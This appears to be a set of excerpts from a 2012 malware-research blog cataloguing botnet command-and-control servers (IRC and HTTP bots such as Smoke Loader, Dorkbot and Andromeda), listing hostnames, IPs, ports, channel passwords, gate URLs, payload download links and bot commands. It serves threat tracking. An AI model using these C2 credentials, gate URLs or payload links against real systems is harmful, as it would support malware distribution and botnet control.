Resolved chat.barracudasec.com to 94.242.204.181 Server: chat.barracudasec.com Ports: 1337,4667 (bots connect on 4667) Channel: #xxploasion Channel passoword: Rebels2012 Channel: #hflove Channel passoword: inspiron Connects using the no-ip hflove.no-ip.org Channel: #gavin0hanson Channel password: hanson911 Channel Users Topic #xxploasion 4 [+sntu] #hflove 45 [+s] #gavin0hanson 53 [+sntu] This irc server is similar to cmjc.whhcd.info in that is itRead more...
planetstat2324.su (smoke loader http bot hosted by Poland Artnet Spolka Z Ograniczona Odpowiedzialnoscia)
This is the http loader for the gold installs ppi program. Resolved planetstat2324.su to 178.255.43.67 Server: planetstat2324.su Gate file: /gamenew/index.php Downloads files from ap2producoes.com/images/ minsabdedf.exe bitcoin miner pool info: http://hernyoooo@ymail.com:Bazdmeg1@pool.50btc.com:8332 ginamdasm.exe The file botnet owners are given installs smoke from hxxp://oroihfdbbnennm.in/update/0pdat3.exe Install statistics are then recorded by oroihfdbbnennm.in/activation.php Using the format activation.php?productid=(userid)&serial=(long string) Hosting infos:Read more...
venus.timeinfo.pl (ngrbot irc botnet hosted by 1&1 Internet Ag)
Note: New domains are at the bottom of the post This is the skype “worm” that is in the news right now Articles: http://www.techspot.com/news/50443-dorkbot-worm-spreading-via-skype-installs-nasty-ransomware.html http://news.cnet.com/8301-1009_3-57528353-83/worm-spreading-on-skype-im-installs-ransomware/ http://techcrunch.com/2012/10/08/ransomware-worm-now-spreading-on-skype/ http://www.forbes.com/sites/adriankingsleyhughes/2012/10/08/ransomware-worm-spreading-via-skype/ http://countermeasures.trendmicro.eu/skype-worm-spreading-fast/ Resolved venus.timeinfo.pl to 63.223.107.62, 176.9.192.131, 213.165.71.142, 217.160.108.147, 213.165.71.153, 87.106.98.157, 74.208.112.178 Server: venus.timeinfo.pl Port: 1863 Password: 24r34t SSL is needed to connect, accept the invalid certificate Authhost: bossmanRead more...
b4buj4ym0d3m.nl.ai (Aryan irc botnet hosted by Canada Montreal Ovh Hosting Inc).
Resolved b4buj4ym0d3m.nl.ai to 198.27.119.91 Server: b4buj4ym0d3m.nl.ai Port: 6969 Channel: #Aryan# Channel password: Aryan * Topic for #Aryan# is: @Botkill * Topic for #Aryan# set by God at Mon Oct 08 01:09:13 2012 No weed MOTD for this one. Hosting infos: http://whois.domaintools.com/198.27.119.91
lucasbaby.no-ip.info (Irc botnets hosted by Canada Montreal Ovh Hosting Inc.)
Resolved lucasbaby.no-ip.info to 142.4.203.95 Server: lucasbaby.no-ip.info Port: 6969 Channel: #karmie# Channel password: 1234 Nick: [USA|XP|gjetth] Topic for #karmie# is: @dl 1 hxxp://dl.dropbox.com/u/81040225/raw_out.exe Topic for #karmie# set by God at Sun Oct 07 13:42:09 2012 Opers: [Boss] (Anxiety@HaZe.GoV): Anxiety [Boss] ~#karmie# [Boss] irc.HaZe.GoV :HaZeNet [Boss] idle 12:09:34, signon: Mon Oct 08 00:16:30 [Boss] End of WHOISRead more...
123.gets-it.net (Ganja ircbot hosted by United States St. Louis Hosting Solutions International Inc)
Resolved 123.gets-it.net to 69.64.62.151 Server: 123.gets-it.net Port: 6697 * Current Local Users: 34 Max: 40 * Current Global Users: 34 Max: 40 Channel: #Ganja * Topic for #Ganja is: DO NOT USE THE SPEEDTEST COMMAND! * Topic for #Ganja set by Anxiety at Sat Oct 06 02:54:30 2012 Opers: * [Anxiety] (Anxiety@Test-5D47311C.bchsia.telus.net): Anxiety * [Anxiety]Read more...
50.7.239.180 (Rage bots hosted by Czech Republic Zlin Fdcservers.net)
Server: 50.7.239.180 Port: 7777 Channel: #rage * Topic for #rage is: .b0tk1ller 30 .p2p .rarworm .xpl 75 1 75.x.x.x 3 1 76.x.x.x * Topic for #rage set by cyberthrill at Wed Oct 03 13:55:03 2012 Nick format: L0v3|fQrHrWbarp Opers: * [BGChaser] (Ares@sab-5E6EA00F.telnet.bg): Ares * [BGChaser] @#rinfo @#binfo #rscan @#rage @#bkiller #b * [BGChaser] 50.7.239.180 :ServerRead more...
casinovegas.mobi (voip scanning botnet hosted by United States Missoula Sharktech)
I found this recently and though it was interesting enough to post. It’s a http controlled botnet used to scan for voip servers. Malware actionsTells the C&C server it has installed208.98.52.163/90/getip.php?action=liveRequests an ip segement to scan208.98.52.163/90/getip.php?action=getDownloads and installs python (Needed for the scanner)hxxp://208.98.52.163/90/files/python-2.7.2.msiIP range to be scanned is confirmed208.98.52.163/90/insert.php?action=online&computer=USER-PC&range=95.211.169.45-95.211.199.255Unrar utility is downloadedhxxp://208.98.52.163/90/files/UnRAR.exeScanner is downloadedhxxp://208.98.52.163/90/files/pack.rarThe malwareRead more...
ns3.captain-packet.net(irc botnet hosted in United States Washington Psinet Inc).
Resolved : [ns3.captain-packet.net] To [154.35.64.24] Remote Host Port Number ns3.captain-packet.net 3900 PASS zomg NICK banzlUSER ypawhj 0 0 :banzlUSERHOST banzlMODE banzl -x+iBJOIN ###bye### byeeeeeNICK pfyfxdUSER bagjsml 0 0 :pfyfxdUSERHOST pfyfxdMODE pfyfxd -x+iBNICK jyptraxUSER xncqm 0 0 :jyptraxUSERHOST jyptraxMODE jyptrax -x+iBNICK peajiUSER etngec 0 0 :peajiUSERHOSTRead more...
crysis4.net (Andromeda http bot hosted by Ukraine Ukrainian Internet Names Center Ltd)
Resolved crysis4.net to 91.231.84.114 Gate url: http://crysis4.net/knockout/image.php Login url: http://crysis4.net/knockout/index.php Rootkit plugin: http://crysis4.net/test/r.pack Hosting infos: http://whois.domaintools.com/91.231.84.114